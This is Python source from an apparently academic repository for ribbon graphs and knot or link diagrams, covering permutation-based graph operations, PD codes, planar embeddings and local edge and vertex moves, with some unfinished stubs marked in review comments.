    new_next = self.next * Permutation(cycles=vertex_cycles)
    return RibbonGraph([new_op, new_next])
def connect_vertices(self, pairing):
    # TODO: unimplemented placeholder — presumably intended to connect
    # free half-edges according to pairing; confirm intended semantics.
    pass
def remove_labels(self, labels):
    """Return a copy of this ribbon graph with the given half-edge labels removed."""
    discard = set(labels)
    trimmed_op = self.opposite.restricted_to(self.opposite.labels() - discard)
    trimmed_next = self.next.restricted_to(self.next.labels() - discard)
    return RibbonGraph([trimmed_op, trimmed_next])
def vertex_merge_unmerge(self,a,b):
    """
    If a and b are on the same vertex, disconnects the vertex at the
    corners before a and b.
    If a and b are on different vertices, connects the two vertices at
    the corners before a and b.
    If a or b are not in the set of labels already present, this adds
    a new dart
    """
    # Composing next with the transposition (a b) splits or merges the
    # cycles containing a and b, depending on whether they share a cycle.
    return RibbonGraph(permutations = [self.opposite, self.next*Permutation({a:b,b:a})])
def orientations(self):
    """
    Assign +1 or -1 to each vertex according to whether it is first
    fixed by iterates of next*opposite*next*next or of its inverse.

    BUG FIX: the original removed elements from `vertices` while
    iterating it directly (a RuntimeError for a set, silently skipped
    elements for a list). Iterate over a snapshot instead, and stop
    scanning once the owning vertex is found (vertices are disjoint,
    so a label belongs to at most one).
    """
    vertices = self.vertices()
    n = self.next
    o = self.opposite
    orientations = {}
    p = n
    pi = n.inverse()
    while vertices:
        p = p*o*n*n
        pi = pi*o*n*n
        for i in p.fixed_points():
            for vertex in list(vertices):
                if i in vertex:
                    orientations[vertex] = 1
                    vertices.remove(vertex)
                    break
        for i in pi.fixed_points():
            for vertex in list(vertices):
                if i in vertex:
                    orientations[vertex] = -1
                    vertices.remove(vertex)
                    break
    return orientations
def draw_strand_along_path(self, start, end, path):
    """
    Given an EmbeddedPath in the DUAL ribbon graph
    from two disconnected labels (i.e., labels 'start' and 'end'
    for which self.opposite is a fixed point), create a strand from one
    to the other crossing along the edges in path.
    The label 'start' must be on the same face as the first label in path,
    and the label 'end' must be OPPOSITE a label on the same face as the
    last label in path. So, path is the sequence of edges you must cross to
    get from the face containing start to the face containing end.
    """
    op = self.opposite
    # NOTE(review): `next` is bound but never used below.
    next = self.next
    if op[start] != start:
        raise Exception("The start label is already connected.")
    if op[end] != end:
        raise Exception("The end label is already connected.")
    if path.labels[0] not in self.face(start):
        raise Exception("Path must begin on same face as start label.")
    if self.opposite[path.labels[-1]] not in self.face(end):
        raise Exception("Path must finish on a label opposite the face of the end label.")
    # Cut every edge the strand crosses, then drop a new 4-valent vertex
    # (a crossing) in the middle of each cut edge.
    new_ribbon_graph = self.disconnect_edges(path.labels)
    new_labels = new_ribbon_graph.make_new_labels(len(path.labels))
    new_ribbon_graph = new_ribbon_graph.add_new_vertices(new_labels, 4)
    #Making the connections along the path itself
    # Slots 0 and 2 of each new crossing carry the new strand.
    connections = [(start, (new_labels[0],0))]
    for i in range(len(new_labels)-1):
        new_label, next_new_label = new_labels[i], new_labels[i+1]
        connections.append( ( (new_label,2) , (next_new_label,0) ) )
    connections.append((end, (new_labels[-1], 2)))
    #Making the connections on either side of the path (to the edges crossed)
    # Slots 1 and 3 reconnect the two halves of each cut edge.
    for new_label, label in zip(new_labels, path.labels):
        connections.append((label,(new_label,1)))
        connections.append((self.opposite[label],(new_label,3)))
    return new_ribbon_graph.connect_edges(connections)
def move_strand_off_crossing(self, label, ccw=True):
    """
    Take the strand defined by label and move it around the vertex in the
    counterclockwise direction (unless ccw is set to False).
    If the number of labels around the vertex is odd, then there are no
    'strands' so it raises an exception.

    NOTE(review): unfinished — only the vertex lookup is done; nothing is
    moved or returned, and the documented exception is never raised.
    """
    vertex = self.vertex(label)
def permutation_subgroup(self):
    """Return the permutation group generated by the opposite and next permutations."""
    # NOTE(review): PermutationGroup is presumably Sage's — confirm import site.
    opposite_cycles = [tuple(c) for c in self.opposite.cycles()]
    next_cycles = [tuple(c) for c in self.next.cycles()]
    return PermutationGroup([opposite_cycles, next_cycles])
def medial_map(self):
    """
    Return the medial map of this ribbon graph: each half-edge label i
    spawns two new labels (i, 1) and (i, -1), paired up via next_corner.

    CLEANUP: the original had an inner loop `for s in [-1,1]:` whose
    variable was never used — each pass wrote the same two dictionary
    keys, so the loop was redundant and has been removed (same result).
    """
    next_corner = self.next_corner()
    next_corner_inverse = next_corner.inverse()
    labels = self.labels()
    new_next_dict = {}
    for i in labels:
        j = self.opposite[i]
        new_next_dict[(i,1)] = (j, -1)
        new_next_dict[(j,-1)] = (j, 1)
        new_next_dict[(j,1)] = (i, -1)
        new_next_dict[(i,-1)] = (i, 1)
    new_next = Permutation(new_next_dict)
    new_op_dict = {}
    for i in labels:
        new_op_dict[(i,1)] = (next_corner[i],-1)
        new_op_dict[(i,-1)] = (next_corner_inverse[i],1)
    new_op = Permutation(new_op_dict)
    return RibbonGraph(permutations=[new_op, new_next])
def PD_code(self):
    """Return the PD code: for each vertex, the index of the edge met at each slot, in cyclic order."""
    edge_list = self.edges()
    code = []
    for vertex in self.vertices():
        vertex_code = []
        for half_edge in vertex:
            # Index of the first edge containing this half-edge.
            for edge_index, edge in enumerate(edge_list):
                if half_edge in edge:
                    vertex_code.append(edge_index)
                    break
        code.append(vertex_code)
    return code
def path_permutation(self, cycle_type):
    """
    Return the permutation obtained by starting with opposite, then for
    each turn amount in cycle_type multiplying by next that many times
    followed by opposite, with one extra opposite factor at the end.

    NOTE(review): indentation reconstructed — confirm the final
    `perm*self.opposite` really sits outside the outer loop.
    """
    perm = self.opposite
    for turn_amount in cycle_type:
        for i in range(turn_amount):
            perm = perm * self.next
        perm = perm*self.opposite
    perm = perm*self.opposite
    return perm
def search_for_cycles(self, max_turn, length):
    """Return every turn-degree sequence (entries 1..max_turn, given length) whose path permutation has a fixed point."""
    found = []
    for candidate in itertools.product(range(1, max_turn+1), repeat=length):
        if self.path_permutation(candidate).fixed_points():
            found.append(candidate)
    return found
def search_for_embedded_cycles(self, max_turn, length):
    """
    Return EmbeddedCycle objects found among the fixed points of the
    path permutations produced by search_for_cycles.

    BUG FIX: the bare `except:` also swallowed KeyboardInterrupt and
    SystemExit; narrowed to `except Exception:` (EmbeddedCycle raises
    plain Exception on failure, falling back to a Path).
    """
    cycle_types = self.search_for_cycles(max_turn, length)
    cycles = []
    for p in cycle_types:
        pp = self.path_permutation(p)
        fixed_points = pp.fixed_points()
        # Skip degenerate cases where every label is fixed.
        if len(fixed_points) < self.size():
            while fixed_points:
                start_point = fixed_points.pop()
                cycle = None
                try:
                    cycle = EmbeddedCycle(self, start_point, turn_degrees=p)
                except Exception:
                    cycle = Path(self, start_point, turn_degrees=p)
                # Don't restart from labels already covered by this cycle.
                fixed_points = fixed_points - set(cycle.labels)
                if isinstance(cycle, EmbeddedCycle):
                    cycles.append(cycle)
    return cycles
def search_for_embedded_cycles_through(self, start_point, length):
    """Return all embedded cycles of exactly the given length passing through start_point."""
    frontier = [EmbeddedPath(self, start_point, labels=[start_point])]
    for _ in range(length - 1):
        frontier = [extension
                    for path in frontier
                    for extension in path.one_step_continuations()]
    return [path.complete_to_cycle()
            for path in frontier if path.is_completable_to_cycle()]
def search_for_long_embedded_cycles_through(self, start_point, max_length):
    """Return the longest embedded cycles (up to max_length) through start_point."""
    frontier = [EmbeddedPath(self, start_point, labels=[start_point])]
    best_cycles = []
    for _ in range(max_length - 1):
        extensions = [continuation
                      for path in frontier
                      for continuation in path.one_step_continuations()]
        if not extensions:
            # No way to extend any path; keep the last batch of cycles found.
            break
        frontier = extensions
        completed = [path.complete_to_cycle()
                     for path in frontier if path.is_completable_to_cycle()]
        if completed:
            best_cycles = completed
    return best_cycles
def search_for_embedded_cycle_with_start_and_goal(self, start, goal_labels, max_length):
    """
    Breadth-first search for embedded cycles through `start` (length at
    most max_length) that also pass through at least one of goal_labels.
    Returns every qualifying cycle found along the way.
    """
    embedded_paths = [EmbeddedPath(self, start, labels = [start])]
    cycles_through_goal = []
    for i in range(max_length-1):
        new_paths = []
        for path in embedded_paths:
            new_paths.extend(path.one_step_continuations())
        if new_paths:
            embedded_paths = new_paths
            cycles = [P.complete_to_cycle() for P in embedded_paths if P.is_completable_to_cycle()]
            for cycle in cycles:
                for label in cycle.labels:
                    if label in goal_labels:
                        cycles_through_goal.append(cycle)
                        # Stop scanning labels once one goal is hit.
                        break
        else:
            # No paths could be extended; search is exhausted.
            break
    return cycles_through_goal
def copy(self):
    """Return a new RibbonGraph built from copies of the underlying permutations."""
    opposite_copy = Permutation(self.opposite)
    next_copy = Permutation(self.next)
    return RibbonGraph([opposite_copy, next_copy])
def info(self):
    """Print a human-readable summary of vertices, edges, and faces."""
    summary = "Vertices: {}\nEdges: {}\nFaces: {}".format(
        self.vertices(), self.edges(), self.faces())
    print(summary)
def random_label(self):
    """Return a uniformly random half-edge label of this ribbon graph."""
    all_labels = tuple(self.labels())
    return choice(all_labels)
def sage(self):
    """
    Convert this ribbon graph to a Sage Graph with a combinatorial
    embedding (vertices and edges of the ribbon graph both become Sage
    graph vertices, alternating along each edge).

    BUG FIX: `vertices` and `edges` were `map` objects — single-use
    iterators under Python 3 — but both are iterated repeatedly below,
    so every pass after the first saw them empty. They are now lists.
    """
    from sage.all import Graph
    G = Graph(multiedges=True, loops=True)
    vertices = [tuple(v) for v in self.vertices()]
    edges = [tuple(e) for e in self.edges()]
    embedding = {}
    for vertex in vertices:
        vertex_order = []
        for label in vertex:
            # Find the edge containing this half-edge label.
            for edge in edges:
                if label in edge:
                    break
            G.add_edge(vertex, edge)
            vertex_order.append(edge)
        embedding[vertex] = vertex_order
    for edge in edges:
        edge_order = []
        for label in edge:
            # Find the vertex containing this half-edge label.
            for vertex in vertices:
                if label in vertex:
                    break
            edge_order.append(vertex)
        embedding[edge] = edge_order
    G.set_embedding(embedding)
    return G
def random_link_shadow(size, edge_conn=2):
    """Return a RibbonGraph for a random link shadow with `size` crossings.

    NOTE(review): map_to_link and random_map are not defined or imported in
    this file — confirm where they are expected to come from.
    """
    PD = map_to_link(random_map(size, edge_conn_param=edge_conn)).PD_code()
    return RibbonGraph(PD=PD)
def trefoil():
    """Ribbon graph of the standard trefoil shadow: three 4-valent vertices, six edges."""
    vertex_cycles = [('a','b','c','d'),
                     ('e','f','g','h'),
                     ('i','j','k','l')]
    edge_pairs = [('a','f'), ('b','e'), ('c','l'),
                  ('d','k'), ('i','h'), ('g','j')]
    return RibbonGraph([Permutation(cycles=edge_pairs),
                        Permutation(cycles=vertex_cycles)])
def loops():
    """Ribbon graph with two 4-valent vertices, each carrying a loop, joined by two edges."""
    vertex_cycles = [(1,2,3,4), (5,6,7,8)]
    edge_pairs = [(1,5), (2,8), (3,4), (6,7)]
    return RibbonGraph([Permutation(cycles=edge_pairs),
                        Permutation(cycles=vertex_cycles)])
def torus():
    """Ribbon graph of the torus: one vertex, two edges (the standard one-vertex square)."""
    vertex_cycles = [(1,2,3,4)]
    edge_pairs = [(1,3), (2,4)]
    return RibbonGraph([Permutation(cycles=edge_pairs),
                        Permutation(cycles=vertex_cycles)])
def disk_with_handles(pairing):
    """Ribbon graph with one vertex whose half-edges are paired into edges by `pairing`."""
    all_labels = sorted({endpoint for pair in pairing for endpoint in pair})
    vertex = Permutation(cycles=[all_labels])
    edges = Permutation(cycles=pairing)
    return RibbonGraph([edges, vertex])
def cube():
    """Ribbon graph of the cube: eight 3-valent vertices joined by twelve edges."""
    vertex_cycles = [(1,2,3), (4,5,6), (7,8,9), (10,11,12),
                     (13,14,15), (16,17,18), (19,20,21), (22,23,24)]
    edge_pairs = [(1,5), (4,8), (7,11), (2,10),
                  (13,18), (16,21), (19,24), (22,15),
                  (3,14), (6,17), (9,20), (12,23)]
    return RibbonGraph([Permutation(cycles=edge_pairs),
                        Permutation(cycles=vertex_cycles)])
|
{"/ribbon_graph_base.py": ["/permutation.py", "/cycle.py"], "/maps.py": ["/permutation.py"], "/draw.py": ["/cycle.py", "/decompositions.py"], "/decompositions.py": ["/cycle.py"], "/__init__.py": ["/ribbon_graph_base.py", "/cycle.py", "/maps.py", "/permutation.py", "/trees.py", "/decompositions.py"], "/cycle.py": ["/local_moves.py"], "/trees.py": ["/ribbon_graph_base.py", "/permutation.py"], "/three_manifold.py": ["/permutation.py", "/ribbon_graph_base.py", "/cycle.py", "/local_moves.py"]}
|
27,853
|
malikobeidin/ribbon_graph
|
refs/heads/master
|
/maps.py
|
from permutation import Bijection, Permutation, permutation_from_bijections
from ribbon_graph import RibbonGraph
import spherogram
class MapVertex(object):
    """
    A vertex of a map with a fixed number of cyclically ordered slots.
    Slots are connected pairwise across vertices via `v[i] = w[j]`.
    """
    def __init__(self, label, num_slots):
        self.label = label
        # One cycle through all (label, slot) pairs: the cyclic order at this vertex.
        self.next = Permutation(cycles = [[(self.label,i) for i in range(num_slots)]])
        # Records which (label, slot) is glued to which; keys are (label, slot) pairs.
        self.opposite = Bijection()
    def __repr__(self):
        return self.label
    def __getitem__(self, i):
        return (self, i)
    def __setitem__(self, i, other):
        """Connect slot i of this vertex to slot j of other_vertex.

        Raises if either slot is already occupied or the two slots coincide.
        """
        other_vertex, j = other
        # BUG FIX: occupancy is recorded under (label, slot) keys, but the
        # original tested the (vertex, slot) pairs returned by __getitem__,
        # so "Slot already occupied" could never fire.
        if (self.label, i) in self.opposite or (other_vertex.label, j) in other_vertex.opposite:
            raise Exception("Slot already occupied")
        if self[i] == other:
            raise Exception("Can't connect slot to itself")
        self.opposite[(self.label,i)] = (other_vertex.label, j)
        other_vertex.opposite[(other_vertex.label,j)] = (self.label,i)
    def __len__(self):
        return len(self.next)
class StrandDiagram(object):
    """
    A ribbon graph together with a height assigned to each half-edge
    label, as in a knot/link diagram where strands pass over and under.
    """
    def __init__(self, ribbon_graph, heights, verify=True):
        # heights: dict mapping each half-edge label to its strand height.
        self.ribbon_graph = ribbon_graph
        self.heights = heights
        if verify:
            self._verify_eulerian_and_height_rules()
    def _verify_eulerian_and_height_rules(self):
        """Check that every vertex has even degree and a legal height pattern."""
        labels = self.ribbon_graph.labels()
        while labels:
            label = labels.pop()
            vertex = self.ribbon_graph.vertex(label)
            heights_around_vertex = [self.heights[label]]
            for other_vertex_label in vertex[1:]:
                heights_around_vertex.append(self.heights[other_vertex_label])
                # Each vertex is processed once; drop its labels from the pool.
                labels.remove(other_vertex_label)
            vertex_length = len(heights_around_vertex)
            if (vertex_length % 2) != 0:
                raise Exception("Diagram has vertex of odd degree")
            # A strand passes straight through the vertex, so the height
            # sequence must repeat after half a turn.
            first_half, second_half = heights_around_vertex[:(vertex_length//2)], heights_around_vertex[(vertex_length//2):]
            if first_half != second_half:
                raise Exception("Strand heights inconsistent around vertex")
            if set(first_half) == set(range(len(first_half))) or set(first_half) == set([0]):
                #checking that first_half is just a permutation of 0,...,len(first_half) (a normal crossing) or all zeros (a virtual crossing)
                continue
            else:
                raise Exception("Strand heights not in allowed pattern.")
    def crossing_type(self, label):
        """Classify the vertex containing label by its distinct heights:
        'v' (all equal, virtual), 'c' (two heights, classical crossing),
        'm' (three or more heights)."""
        vertex = self.ribbon_graph.vertex(label)
        vertex_heights = [self.heights[l] for l in vertex]
        if len(set(vertex_heights)) == 1:
            return 'v'
        elif len(set(vertex_heights)) == 2:
            return 'c'
        else:
            return 'm'
class Link(StrandDiagram):
    """
    A link diagram built from 4-slot MapVertex objects (or a PD code),
    with strand heights determined by slot parity.
    """
    def __init__(self, vertices=[], PD=[]):
        # NOTE(review): mutable default arguments; harmless here since they
        # are never mutated, but None defaults would be safer.
        if PD and not vertices:
            vertices = self._vertices_from_PD(PD)
        opposite = permutation_from_bijections([v.opposite for v in vertices])
        next = permutation_from_bijections([v.next for v in vertices])
        ribbon_graph = RibbonGraph([opposite,next])
        # Height of each half-edge is its slot parity (odd slots get height 1).
        heights = {label: label[1]%2 for label in ribbon_graph.labels()}
        super(Link,self).__init__(ribbon_graph, heights)
        self._verify_valence_and_heights()
    def _vertices_from_PD(self, PD):
        """Build connected MapVertex objects from a PD (planar diagram) code."""
        vertices = [MapVertex(i,4) for i in range(len(PD))]
        # edge_dict remembers the first (vertex, slot) where each edge number
        # appeared; the second appearance triggers the connection.
        edge_dict = {}
        for vertex_label, edge_list in enumerate(PD):
            for slot, edge in enumerate(edge_list):
                if edge in edge_dict:
                    old_vertex_label, old_slot = edge_dict[edge]
                    vertices[vertex_label][slot] = vertices[old_vertex_label][old_slot]
                else:
                    edge_dict[edge] = (vertex_label, slot)
        return vertices
    def _verify_valence_and_heights(self):
        # TODO: not yet implemented.
        pass
    def spherogram(self):
        """
        Return a spherogram Link object.
        """
        vertices = self.ribbon_graph.vertices()
        edges = self.ribbon_graph.edges()
        PD = []
        for v in vertices:
            # Rotate the vertex code when slot 0 sits at height 1 —
            # presumably to match spherogram's under-strand-first PD
            # convention; confirm against spherogram documentation.
            needs_rotation = False
            if self.heights[v[0]] == 1:
                needs_rotation = True
            vertex_code = []
            for i in v:
                for j, edge in enumerate(edges):
                    if i in edge:
                        vertex_code.append(j)
                        break
            if needs_rotation:
                new_vertex_code = vertex_code[1:]
                new_vertex_code.append(vertex_code[0])
                vertex_code = new_vertex_code
            PD.append(vertex_code)
        return spherogram.Link(PD)
def trefoil():
    """Build the trefoil Link by wiring three 4-slot vertices together in a cycle."""
    a, b, c = (MapVertex(name, 4) for name in 'abc')
    # Each vertex connects its slots 0 and 1 to slots 3 and 2 of the next.
    for source, target in ((a, b), (b, c), (c, a)):
        source[0] = target[3]
        source[1] = target[2]
    return Link([a, b, c])
|
{"/ribbon_graph_base.py": ["/permutation.py", "/cycle.py"], "/maps.py": ["/permutation.py"], "/draw.py": ["/cycle.py", "/decompositions.py"], "/decompositions.py": ["/cycle.py"], "/__init__.py": ["/ribbon_graph_base.py", "/cycle.py", "/maps.py", "/permutation.py", "/trees.py", "/decompositions.py"], "/cycle.py": ["/local_moves.py"], "/trees.py": ["/ribbon_graph_base.py", "/permutation.py"], "/three_manifold.py": ["/permutation.py", "/ribbon_graph_base.py", "/cycle.py", "/local_moves.py"]}
|
27,854
|
malikobeidin/ribbon_graph
|
refs/heads/master
|
/draw.py
|
import matplotlib.pyplot as plt
import numpy as np
from cycle import EmbeddedCycle
from decompositions import CycleTree
def draw_with_plink(ribbon_graph):
    # TODO: unimplemented — presumably intended to display the graph via plink.
    pass
class Immersion(object):
    """
    Placeholder for an energy-minimizing immersion of a ribbon graph in
    the plane. All methods below are unimplemented stubs.
    """
    def __init__(self, ribbon_graph, head, tail):
        self.ribbon_graph = ribbon_graph
        self.head = head
        self.tail = tail
    def energy(self):
        # TODO: unimplemented.
        pass
    def perturb_downward(self, step):
        # TODO: unimplemented.
        pass
    def perturb_randomly(self, step):
        # TODO: unimplemented.
        pass
    def minimize_energy(self):
        # TODO: unimplemented.
        pass
    def draw(self):
        # TODO: unimplemented.
        pass
class TutteSpringEmbedding(object):
    """
    Tutte-style spring embedding: pin the vertices of one face on a
    circle, then place every interior vertex at the average of its
    neighbors by solving a linear spring system.

    NOTE(review): the print() calls below look like leftover debug output.
    """
    def __init__(self, ribbon_graph, outer_face_label):
        # Vertices of the chosen outer face, as frozensets so they can be
        # compared/indexed against the full vertex list.
        outer_vertices = [frozenset(ribbon_graph.vertex(l)) for l in ribbon_graph.face(outer_face_label)]
        all_vertices = [frozenset(v) for v in ribbon_graph.vertices()]
        outer_vertex_indices = [all_vertices.index(v) for v in outer_vertices]
        print(all_vertices)
        print(outer_vertices)
        print(outer_vertex_indices)
        self.outer_vertex_indices = outer_vertex_indices
        # adjacencies[i] lists neighbor indices of vertex i; outer (pinned)
        # vertices get an empty list so their rows stay identity rows.
        adjacencies = []
        for v in all_vertices:
            opposites = [ribbon_graph.opposite[l] for l in v]
            if v not in outer_vertices:
                adjacencies.append([all_vertices.index(frozenset(ribbon_graph.vertex(l))) for l in opposites])
            else:
                adjacencies.append([])
        print(adjacencies)
        self.adjacencies = adjacencies
        n = len(all_vertices)
        # Row i: x_i - average(neighbors) = b_i (b_i nonzero only for pinned vertices).
        spring_system = np.zeros((n,n))
        for i in range(n):
            spring_system[i][i] = 1
            for j in adjacencies[i]:
                spring_system[i,j] = -1.0/len(adjacencies[i])
        print(spring_system)
        self.spring_system = spring_system
        # Pin the outer vertices evenly around the unit circle (clockwise,
        # hence the -sin for y).
        ts = np.linspace(0, 2*np.pi, len(outer_vertices), endpoint = False)
        bx = np.zeros(n)
        for circle_index,vertex_index in enumerate(outer_vertex_indices):
            bx[vertex_index] = np.cos( ts[circle_index] )
        by = np.zeros(n)
        for circle_index,vertex_index in enumerate(outer_vertex_indices):
            by[vertex_index] = -np.sin( ts[circle_index] )
        print(bx)
        print(by)
        self.bx = bx
        self.by = by
        xs = np.linalg.solve(spring_system, bx)
        ys = np.linalg.solve(spring_system, by)
        self.xs = xs
        self.ys = ys
    def plot(self, filename):
        """Scatter the vertex positions and draw all edges; save to filename.png."""
        xs, ys = self.xs, self.ys
        plt.scatter(xs,ys)
        for v, v_adjacencies in enumerate(self.adjacencies):
            for w in v_adjacencies:
                edge_x = [xs[v], xs[w]]
                edge_y = [ys[v], ys[w]]
                plt.plot(edge_x, edge_y, color='blue')
        # Outer vertices have empty adjacency lists, so draw the outer
        # face boundary explicitly.
        outer_vertex_indices = self.outer_vertex_indices
        for i in range(len(outer_vertex_indices)):
            v, next_v = outer_vertex_indices[i], outer_vertex_indices[(i+1)%len(outer_vertex_indices)]
            edge_x = [xs[v], xs[next_v]]
            edge_y = [ys[v], ys[next_v]]
            plt.plot(edge_x, edge_y, color='blue')
        plt.savefig(filename+'.png')
class PolygonDrawing(object):
    """
    A planar polygon given by its vertex coordinates, with generalized
    (cotangent-weighted) barycentric coordinates and diagonal tracing.
    Several methods are unimplemented stubs.
    """
    def __init__(self, vertices):
        # vertices: sequence of 2D points (assumed numpy arrays — the
        # arithmetic in barycentric_coordinates requires vectors).
        self.vertices = vertices
        self.n = len(vertices)
        # Bounding box of the polygon, used to sample the interior.
        self.min_x = min(x for x,y in vertices)
        self.min_y = min(y for x,y in vertices)
        self.max_x = max(x for x,y in vertices)
        self.max_y = max(y for x,y in vertices)
    def barycentric_coordinates(self, p):
        """Return normalized cotangent-weighted coordinates of point p
        with respect to the polygon's vertices."""
        weights = np.zeros(self.n)
        for i, vertex in enumerate(self.vertices):
            # Neighboring vertices, with cyclic wrap-around.
            previous_vertex = self.vertices[(i-1)%self.n]
            next_vertex = self.vertices[(i+1)%self.n]
            prev_cot = self._cotangent(p, vertex, previous_vertex)
            next_cot = self._cotangent(p, vertex, next_vertex)
            # Squared distance from p to this vertex.
            dist = np.sum((p-vertex)*(p-vertex))
            weights[i] = (prev_cot + next_cot) / dist
        weights = weights/sum(weights)
        return weights
    def diagonal_linear_system(self, i, j):
        # TODO: unimplemented.
        pass
    def trace_diagonal(self, i, j, stepsize, distance_goal=.01):
        """
        Start at vertex i and step in the diagonal direction until you reach
        vertex j.
        """
        # TODO: unimplemented.
        pass
    def diagonal(self, i, j, epsilon = .001, sample_points = 100):
        """Sample the bounding box and return points whose barycentric
        weight is concentrated on vertices i and j (i.e. near the diagonal)."""
        diagonal_points = []
        for x in np.linspace(self.min_x, self.max_x, sample_points):
            for y in np.linspace(self.min_y, self.max_y, sample_points):
                weights = self.barycentric_coordinates( np.array([x,y]) )
                is_diagonal = True
                for k, w in enumerate(weights):
                    if k not in [i,j]:
                        if w > epsilon:
                            is_diagonal = False
                            break
                if is_diagonal:
                    diagonal_points.append( np.array([x,y]) )
        return diagonal_points
    def triangulate(self):
        # TODO: unimplemented.
        pass
    def barycentric_subdivision(self, triangulation):
        # TODO: unimplemented.
        pass
    def parametrization(self, num_subdivisions):
        # TODO: unimplemented.
        pass
    def _cotangent(self, a, b, c):
        """Cotangent magnitude of the angle at b in triangle (a, b, c):
        dot(ba, bc) / |cross(ba, bc)|. Note the absolute value discards sign."""
        ba = a-b
        bc = c-b
        dot = sum(bc*ba)
        det = np.linalg.det(np.array([bc,ba]))
        return dot/abs(det)
class GluedPolygonalDrawing(object):
    """
    Decompose a ribbon graph into a tree of cycles (CycleTree) rooted at
    the boundary of the chosen exterior face, for polygon-based drawing.
    """
    def __init__(self, ribbon_graph, exterior_label, max_length):
        exterior_face = ribbon_graph.face(exterior_label)
        # Walk the exterior face boundary, reversed so its interior lies on the left.
        cycle = EmbeddedCycle(ribbon_graph, exterior_label, turn_degrees=[-1]*len(exterior_face)).reversed()
        self.cycle_tree = CycleTree(cycle, max_length)
|
{"/ribbon_graph_base.py": ["/permutation.py", "/cycle.py"], "/maps.py": ["/permutation.py"], "/draw.py": ["/cycle.py", "/decompositions.py"], "/decompositions.py": ["/cycle.py"], "/__init__.py": ["/ribbon_graph_base.py", "/cycle.py", "/maps.py", "/permutation.py", "/trees.py", "/decompositions.py"], "/cycle.py": ["/local_moves.py"], "/trees.py": ["/ribbon_graph_base.py", "/permutation.py"], "/three_manifold.py": ["/permutation.py", "/ribbon_graph_base.py", "/cycle.py", "/local_moves.py"]}
|
27,855
|
malikobeidin/ribbon_graph
|
refs/heads/master
|
/local_moves.py
|
def add_vertex_on_edge(ribbon_graph, label, new_label_op, new_label_next_corner):
    """
    Add a new valence 2 vertex on the edge given by label (in place).
    The two half-edges of the new vertex get the labels passed as the
    last two parameters.

    BUG FIX: the original body referenced undefined names new_label1 and
    new_label2 (NameError on every call); the only names in scope they
    can correspond to are the two new-label parameters, bound here.
    TODO confirm intended correspondence against callers.
    """
    new_label1, new_label2 = new_label_op, new_label_next_corner
    op_label = ribbon_graph.opposite[label]
    cut_edge(ribbon_graph, label)
    # The new vertex is a 2-cycle in next; its half-edges start free.
    ribbon_graph.next.add_cycle([new_label1, new_label2])
    ribbon_graph.opposite[new_label1] = new_label1
    ribbon_graph.opposite[new_label2] = new_label2
    connect_edges(ribbon_graph, new_label1, label)
    connect_edges(ribbon_graph, new_label2, op_label)
def add_edge(ribbon_graph, label1, label2, new_label1, new_label2):
    """
    Add a new edge connecting the corners AFTER label1 and label2, with
    the new_edge [new_label1, new_label2]

    Mutates ribbon_graph in place.
    """
    ribbon_graph.next.insert_after(label1, new_label1)
    ribbon_graph.next.insert_after(label2, new_label2)
    # Pair the two new half-edges into a single edge.
    ribbon_graph.opposite.add_cycle([new_label1, new_label2])
def double_edge(ribbon_graph, label, new_label1, new_label2):
    """Add a parallel copy of the edge given by label, in place.

    The new edge is inserted after label on one side and after the label
    preceding the opposite half-edge on the other side.
    """
    op_label = ribbon_graph.opposite[label]
    # Last label in the vertex cycle of op_label, i.e. the corner before it.
    prev = ribbon_graph.vertex(op_label)[-1]
    add_edge(ribbon_graph, label, prev, new_label1, new_label2)
def split_vertex(ribbon_graph, label1, label2):
    """Split one vertex into two by cutting its cycle at label1 and label2 (in place)."""
    ribbon_graph.next.split_cycle_at(label1, label2)
def merge_vertices(ribbon_graph, label1, label2):
    """Merge the two vertices containing label1 and label2 into one (in place)."""
    ribbon_graph.next.merge_cycles_at(label1, label2)
def connect_edges(ribbon_graph, label1, label2):
    """
    Join two currently-free half-edges into a single edge (in place).
    Both labels must be fixed points of the opposite permutation.
    """
    op = ribbon_graph.opposite
    both_free = op[label1] == label1 and op[label2] == label2
    if not both_free:
        raise Exception("Edges already connected.")
    op.merge_cycles_at(label1, label2)
def cut_edge(ribbon_graph, label):
    """
    Disconnect an edge, but keep the half-edge labels on each side.
    """
    ribbon_graph.opposite.undo_two_cycle(label)
def delete_edge(ribbon_graph, label):
    """
    Delete the entire edge, with the half-edge labels.

    Mutates ribbon_graph in place: removes the opposite pairing, detaches
    both half-edges from their vertex cycles, then removes the labels.
    """
    op_label = ribbon_graph.opposite[label]
    ribbon_graph.opposite.remove_cycle(label)
    ribbon_graph.next.split_label_from_cycle(label)
    ribbon_graph.next.split_label_from_cycle(op_label)
    ribbon_graph.next.remove_fixed_point(label)
    ribbon_graph.next.remove_fixed_point(op_label)
def cross_face(ribbon_graph, label1, label2, new_label1_op, new_label1_next_corner, new_label2_op, new_label2_next_corner):
    """Unfinished: intended to add a strand crossing the face shared by label1 and label2.

    NOTE(review): currently broken — add_vertex_on_edge takes four
    arguments but is called with three, and the remaining parameters are
    unused (see the original '#fix' marker).
    """
    assert label2 in ribbon_graph.face(label1)
    add_vertex_on_edge(ribbon_graph, label1, new_label1_op)
    pass #fix
def contract_edge(ribbon_graph, label):
    """
    Merge the vertices on either side of the edge by collapsing the edge.

    Mutates ribbon_graph in place. The predecessors of both half-edges
    are recorded first, since the labels vanish when the edge is deleted.
    """
    op_label = ribbon_graph.opposite[label]
    label_previous = ribbon_graph.next.previous(label)
    op_label_previous = ribbon_graph.next.previous(op_label)
    delete_edge(ribbon_graph, label)
    ribbon_graph.next.merge_cycles_at(label_previous, op_label_previous)
def cut_vertex(ribbon_graph, label):
    """
    Cut all edges coming out of a vertex.

    Mutates ribbon_graph in place: every incident edge is disconnected,
    the freed half-edges on the vertex are removed, and finally the
    vertex cycle itself is removed.
    """
    seen_labels = set([])
    vertex = ribbon_graph.vertex(label)
    for l in vertex:
        if l not in seen_labels:
            # Mark both ends so a loop at this vertex is only cut once.
            seen_labels.add(l)
            seen_labels.add(ribbon_graph.opposite[l])
            ribbon_graph.opposite.undo_two_cycle(l)
    for l in vertex:
        ribbon_graph.opposite.remove_fixed_point(l)
    ribbon_graph.next.remove_cycle(label)
def delete_vertex(ribbon_graph, label):
    """Delete a vertex by deleting every edge incident to it (in place).

    NOTE(review): assumes delete_edge leaves the remaining labels of
    `vertex` valid while iterating — confirm for loops at the vertex.
    """
    seen_labels = set([])
    vertex = ribbon_graph.vertex(label)
    for l in vertex:
        if l not in seen_labels:
            # Mark both ends so each edge (including loops) is deleted once.
            seen_labels.add(l)
            seen_labels.add(ribbon_graph.opposite[l])
            delete_edge(ribbon_graph, l)
